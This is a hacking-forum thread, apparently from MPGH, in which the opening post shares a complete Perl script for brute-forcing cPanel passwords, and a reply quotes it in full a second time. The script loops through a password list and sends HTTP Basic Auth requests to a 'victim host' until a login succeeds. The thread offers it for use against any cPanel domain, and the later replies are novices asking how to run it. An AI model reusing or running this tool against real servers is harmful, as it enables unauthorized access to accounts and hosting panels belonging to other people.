Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Hacking › Exploits › Cpanel Password Brute Force Tool EXPLOIT

ExclamationCpanel Password Brute Force Tool EXPLOIT

Posts 1–15 of 19 · Page 1 of 2
RO
RoB07
Cpanel Password Brute Force Tool EXPLOIT
Pearl =)

[PHP]#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}[/PHP]
#1 · 18y ago
Alen
Alen
Quote Originally Posted by RoB07 View Post
Pearl =)

[PHP]#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart = "-1";

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close

";
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}[/PHP]
For what is this? vBulletin?
#2 · 18y ago
RO
RoB07
Any Domain with cPanel
#3 · 18y ago
FR
frono15
Wow,Thx for this
#4 · 18y ago
DE
Dec0r87930
This can be applied on, vBulletin, ipb boards, phpbb... and simple machine.
#5 · 18y ago
XX
XxUbErHaCkSxX
rawr! idk how to use this please teach me someone!
#6 · 18y ago
FA
farbod
i would tell u teach but its goin to take a while PM me
#7 · 18y ago
FE
Ferlas Soram
Would you be able to kindly explain to me how to use this?

If not, thats OK too. I can always try to dissect it myself.
#8 · 18y ago
arunforce
[MPGH]arunforce
It's PERL, it's self explanatory.

Oh and how can it be a bruteforcer and exploit. -_-
#9 · 18y ago
FE
Ferlas Soram
PERL is a programming language, right?

Where could I download it?
Sorry, I'm a huge n00b.
#10 · 18y ago
Mr.Dark Shark!!
Mr.Dark Shark!!
hey ya ,,,

sorry 1st about my bad language .. then - this is my 1st replay here and i hoppe that it gonna ok ..


from here u can download it,,
http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



take care


i WaS H3r3
\
/
\
/
Mr.Dark Shark!!
#11 · 18y ago
DA
daveannan
how do i use it in cmd cd C:\perl\bin
#12 · 18y ago
Xeg
Xeg
Could anyone explain how this works?

Already tried but can't make it work <.<
#13 · 18y ago
HA
Hacksomegamers
what happened to it?
yeh the url isn't found.
Quote Originally Posted by Mr.Dark Shark!! View Post
hey ya ,,,

sorry 1st about my bad language .. then - this is my 1st replay here and i hoppe that it gonna ok ..


from here u can download it,,
http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



take care


i WaS H3r3

/

/
Mr.Dark Shark!!
#14 · 18y ago
BU
BuLu
Hi,
anyone any idea how to downloadt it ?n how to use it?Im a Newbie
Here.Thanks
#15 · 18y ago
Posts 1–15 of 19 · Page 1 of 2

Post a Reply

Similar Threads

  • Active Directory Brute Force ToolBy freedompeace in Coders Lounge
    7Last post 13y ago
  • [Release] Jorg hi's Brute Force CrackerBy HazedUp in General Hacking
    0Last post 17y ago
  • Compiling and/or Brute ForcingBy 9Lives CatsEyes in General Hacking
    0Last post 18y ago
  • How To Brute ForceBy Flawless in Game Hacking Tutorials
    0Last post 20y ago
  • brute force crackingBy ace76543 in Spammers Corner
    2Last post 20y ago

Tags for this Thread

#brute#cpanel#exploit#force#password#tool